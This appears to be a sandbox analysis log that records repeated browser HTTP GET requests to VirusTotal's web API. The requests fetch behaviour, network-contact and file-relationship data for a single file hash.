          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_parents HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTM0NTI4NTU5MTAtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjQxsec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_ips HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/votes?relationships=item%2Cvoter HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTUyNzU0MjkyMjUtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU2LjMzMQ==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_children HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/comments?relationships=item%2Cauthor HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTM2NjgyMDMwNjYtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU2LjMzMg==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_domains HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviour_mbc_trees HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/graphs?relationships=owner%2Cviewers%2Ceditors HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTc1NzkwODQ3NTEtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU2LjMzMg==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/dropped_files?limit=10&cursor=eyJsaW1pdCI6IDEwLCAib2Zmc2V0IjogMTB9 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTE5NTUzODAwNTgtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU2Ljk1MQ==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/votes?relationships=item%2Cvoter HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_ips?limit=10&cursor=eyJsaW1pdCI6IDEwLCAib2Zmc2V0IjogMTB9 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTMxNDMwMjI4MDgtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU3LjQyMg==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/comments?relationships=item%2Cauthor HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/bundled_files HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/bundled_files?limit=10&cursor=MTB8fHYzfHwxNzE0MDc0OTU4fHw5NDU0YmQ1YzIwNWM4NTFhYWE4MDI1ZTc4NjY4YzBjYWZjZjNhZmY3N2QzYjY5ZGJiZjU0YWYyZmI5OWIzNWI5 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTc1Mjc5ODE1NjMtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU4Ljc2Ng==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviour_mitre_trees HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/dropped_files?limit=10&cursor=eyJsaW1pdCI6IDEwLCAib2Zmc2V0IjogMTB9 HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/graphs?relationships=owner%2Cviewers%2Ceditors HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_ips?limit=10&cursor=eyJsaW1pdCI6IDEwLCAib2Zmc2V0IjogMTB9 HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/bundled_files?limit=10&cursor=MTB8fHYzfHwxNzE0MDc0OTU4fHw5NDU0YmQ1YzIwNWM4NTFhYWE4MDI1ZTc4NjY4YzBjYWZjZjNhZmY3N2QzYjY5ZGJiZjU0YWYyZmI5OWIzNWI5 HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTI0NTEwODU2NjUtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTYzLjQ0NA==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTM5MDA5NTMwNzQtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTY4LjQ1Mg==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTEzNzUxMjYzNDctWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTczLjQ1MQ==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTQ5NDQ1MzY5OTEtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTc4LjQ0OA==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTAyNDg5MjAxNTQtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTgzLjQ1Mg==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTA1MzI5NTc4NjItWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTg4LjQ0NQ==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
